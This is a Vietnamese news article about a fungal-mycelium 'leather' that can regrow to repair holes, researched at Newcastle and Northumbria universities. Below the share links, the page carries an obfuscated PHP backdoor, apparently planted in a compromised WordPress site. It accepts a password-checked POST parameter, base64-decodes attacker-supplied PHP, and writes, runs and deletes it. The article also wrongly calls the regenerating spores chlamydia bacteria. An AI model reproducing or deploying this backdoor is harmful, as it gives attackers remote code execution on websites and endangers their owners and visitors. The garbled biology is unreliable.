Triển vọng sản xuất trang phục tự vá làm từ nấm

Nội dung chính

Nhóm nghiên cứu của hai trường đại học NewcastleNorthumbria có một phát hiện đột phá, góp phần hiện thực hóa giấc mơ tạo ra trang phục không bao giờ phải vá hay bỏ đi. Đó là trang phục tự vá làm từ nấm.

Cụ thể, một bài viết đăng trên The ScienceAlert cuối tháng 5/2023 cho biết, để tìm ra sáng kiến đột phá về trang phục tự vá làm từ nấm, nhóm nghiên cứu đã phát hiện các sợi giống rễ cây do nhiều loại nấm tạo thành có tiềm năng được sử dụng làm vật liệu sản xuất trang phục phân hủy sinh học và tự vá.

Trong thử nghiệm của mình, nhóm nghiên cứu tập trung vào nấm Ganoderma lucidum (người Việt gọi là nấm Linh chi). Họ tạo ra một lớp da từ sợi nấm.

Vật liệu dựa trên sợi nấm đã được sử dụng trong không ít lĩnh vực – từ xây dựng đến dệt may. Tuy nhiên, quy trình tạo ra chúng thường giết chết bào tử nấm vốn giúp tổ chức sinh vật trong vật liệu tái sinh.

Nhóm nghiên cứu của 2 trường đại học đã dùng phương pháp mới với hỗn hợp sợi nấm, bào tử khuẩn chlamydia, protein cùng vài chất dinh dưỡng khác trong chất lỏng nhằm khuyến khích sự phát triển của lớp da họ tạo ra.

Thành phẩm hiện tại quá mỏng và yếu chưa thể làm thành trang phục, nhưng nhóm tin tưởng đổi mới công nghệ trong tương lai sẽ giúp tạo ra loại da sợi nấm cứng hơn, có thể bằng cách kết hợp nhiều lớp với nhau hoặc làm dẻo bởi glycerol.

Phương pháp mới của nhóm cũng không giết chết bào tử khuẩn chlamydia. Bào tử có thể tự tái sinh để vá lỗ thủng trên vật liệu nếu được đặt trong điều kiện chúng được tạo ra trước đó. Quá trình vá mất đến vài ngày, tuy nhiên các nhà nghiên cứu hy vọng thời gian sẽ được rút ngắn.

Vật liệu tự vá có triển vọng được ứng dụng trong sản xuất đồ nội thất, ghế ô tô, quần áo thời trang. Với sự phát triển của thời trang bền vững, vật liệu này có thể là tương lai của ngành.

Theo MTG/Sciencealert

https://www.sciencealert.com/your-clothes-in-the-future-could-be-a-living-self-repairing-material

Thấy hay thì Share bạn nhé:

Facebook
Twitter
LinkedIn

Các bài viết khác

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}